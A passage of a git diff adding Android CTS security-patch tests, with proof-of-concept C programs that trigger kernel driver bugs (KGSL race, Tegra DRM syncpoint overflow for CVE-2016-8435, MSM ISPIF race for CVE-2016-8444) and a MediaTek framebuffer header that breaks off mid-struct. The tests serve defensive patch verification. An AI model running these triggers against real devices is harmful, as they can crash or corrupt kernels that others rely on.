+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+ struct kgsl_drawctxt_create ctx;
+ ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+ printf("[*] IOCTL_KGSL_DRAWCTXT_CREATE id(%d), errno = %d\n", ctx.drawctxt_id, errno);
+ g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+ struct kgsl_drawctxt_destroy ctx;
+ ctx.drawctxt_id = id;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+ //printf("[*] IOCTL_KGSL_DRAWCTXT_DESTROY, errno = %d\n", errno);
+}
+
+void trigger_kgsl_timestamp_event() {
+
+
+ //mprotect(event.priv, 0x1000, PROT_READ);
+
+ ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+ printf("[*] IOCTL_KGSL_TIMESTAMP_EVENT fd(%d), errno = %d\n", *(int*)g_event.priv, errno);
+}
+
+int open_driver() {
+ char* dev_path = "/dev/kgsl-3d0";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ close(4);
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(-19, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ trigger_kgsl_create_drawctx();
+
+ g_event.type = 2;
+ g_event.context_id = g_ctx_id;
+ g_event.len = 4;
+ g_event.priv = malloc(0x1000);
+ g_event.timestamp = 0;
+ mprotect(g_event.priv, 0x1000, PROT_READ);
+ //printf("[*] close fd errno = %d\n", errno);
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_kgsl_timestamp_event();
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ /* sizeof(host1x_client) is 232 */
+ unsigned char pad[232]; /* maybe gadget arguments */
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+ /* FIXME we need pass lock op */
+ //struct mutex lock;
+ //bool keepon;
+ //struct host1x_user user;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+ int ret;
+ int dev_fd;
+ int i;
+
+ /* open dev */
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare for ioctl */
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = SYN_NUM;
+ submit_c.syncpts = (__u64)syncpts;
+
+ for(i = 1; i < SYN_NUM; i++){
+ syncpts[i].id = 192;
+ syncpts[i].incrs = 0xffff;
+ }
+
+ /* open channel */
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+ goto out_dev;
+ }
+ submit_c.context = open_c.context;
+ printf("[+] call submit\n");
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ printf("[+] submit return %d\n", ret);
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+ int32_t cfg_type;
+ union {
+ int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
+ uint32_t csid_version; /* ISPIF_INIT */
+ //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
+ //struct msm_ispif_param_data params; /* CFG, START, STOP */
+ };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+ int arg1[3] = {0};
+ switch ((long)arg) {
+ case 0:
+ data.cfg_type = 8; ////release
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+ break;
+ case 1:
+ ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+ break;
+ }
+ return NULL;
+}
+
+int main() {
+
+ int pid,i;
+ pthread_t th[4];
+ fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+ printf("please wait for several seconds...\n");
+
+ while(1){
+
+ data.cfg_type = 2; ////init
+ data.csid_version = 1;
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+ for (i = 0; i < 2; i++) {
+ pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+ usleep(10);
+ }
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK (0x00000fff)
+#define FBCAPS_LCDC_MASK (0x00fff000)
+#define FBCAPS_PANEL_MASK (0xff000000)
+#define FBCAPS_MANUAL_UPDATE (0x00001000)
+#define FBCAPS_SET_BACKLIGHT (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
+#define MTK_IO(num) _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
+#define MTKFB_POWERON MTK_IO(12)
+#define MTKFB_POWEROFF MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION MTK_IO(49)
+#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
+#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+ MTK_FB_ORIENTATION_0 = 0,
+ MTK_FB_ORIENTATION_90 = 1,
+ MTK_FB_ORIENTATION_180 = 2,
+ MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+ MTK_FB_TV_SYSTEM_NTSC = 0,
+ MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+ MTK_FB_TV_FMT_RGB565 = 0,
+ MTK_FB_TV_FMT_YUV420_SEQ = 1,
+ MTK_FB_TV_FMT_UYUV422 = 2,
+ MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+ LAYER_NORMAL_BUFFER = 0,
+ LAYER_SECURE_BUFFER = 1,
+ LAYER_PROTECTED_BUFFER = 2,
+ LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+ char name[32];
+ int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+ MTK_FB_FORMAT format;
+
+ volatile char *outputBuffer;
+ unsigned int wdma_width;
+ unsigned int wdma_height;
+};
+
+struct fb_scale {
+ unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+ unsigned int idx;
+ unsigned long offset;
+};
+
+struct fb_update_window {
+ unsigned int x, y;
+ unsigned int width, height;
+};
+
+typedef enum {
+ LAYER_2D = 0,
+ LAYER_3D_SBS_0 = 0x1,
+ LAYER_3D_SBS_90 = 0x2,
+ LAYER_3D_SBS_180 = 0x3,
+ LAYER_3D_SBS_270 = 0x4,
+ LAYER_3D_TAB_0 = 0x10,
+ LAYER_3D_TAB_90 = 0x20,
+ LAYER_3D_TAB_180 = 0x30,
+ LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+ DISP_DIRECT_LINK_MODE,
+ DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+ MTK_DISP_MODE mode;
+};
+
+typedef enum { /* map sessions to scenairos in kernel driver */
+ DISP_SESSION_LCM = 1 << 0, /* DSI0 */
+ DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+ DISP_SESSION_WFD = 1 << 2,
+ DISP_SESSION_MHL = 1 << 3, /* DPI */
+ DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
+ DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
+ /* TODO:can be extended with other Session Id */
+ SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+ unsigned int session; /* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+ MTK_DISP_MODE mode;
+ unsigned int session;
+};
+struct fb_overlay_buffer {
+ /* Input */
+ int layer_id;
+ unsigned int layer_en;
+ int ion_fd;
+ unsigned int cache_sync;
+ /* Output */
+ unsigned int index;
+ int fence_fd;
+};
+
+struct fb_overlay_layer {
+ unsigned int layer_id;
+ unsigned int layer_enable;
+
+ void *src_base_addr;
+ void *src_phy_addr;
+ unsigned int src_direct_link;
+ MTK_FB_FORMAT src_fmt;
+ unsigned int src_use_color_key;
+ unsigned int src_color_key;
+ unsigned int src_pitch;
+ unsigned int src_offset_x, src_offset_y;
+ unsigned int src_width, src_height;
+
+ unsigned int tgt_offset_x, tgt_offset_y;
+ unsigned int tgt_width, tgt_height;
+ MTK_FB_ORIENTATION layer_rotation;
+ MTK_FB_LAYER_TYPE layer_type;
+ MTK_FB_ORIENTATION video_rotation;
+
+ unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+ int next_buff_idx;
+ int identity;
+ int connected_type;
+ unsigned int security;
+ unsigned int alpha_enable;
+ unsigned int alpha;
+ int fence_fd; /* 8135 */
+ int ion_fd; /* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+ int fence;
+ int time;
+ struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+ unsigned int src_vir_addr;
+ unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+ unsigned int layer_id;
+ unsigned int layer_enabled; /* TO BE DEL */
+ unsigned int curr_en;
+ unsigned int next_en;
+ unsigned int hw_en;
+ int curr_idx;
+ int next_idx;
+ int hw_idx;
+ int curr_identity;
+ int next_identity;
+ int hw_identity;
+ int curr_conn_type;
+ int next_conn_type;
+ int hw_conn_type;
+ MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+ void *phy_addr;
+ void *vir_addr;
+ MTK_FB_TV_SRC_FORMAT format;
+ unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+ MTKFB_DISABLED = 0,
+ MTKFB_SUSPENDED = 99,
+ MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+ MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+ MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+ MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+ struct work_struct work;
+ struct list_head list;
+ struct fb_overlay_config config;
+ struct sync_fence *fences[4];
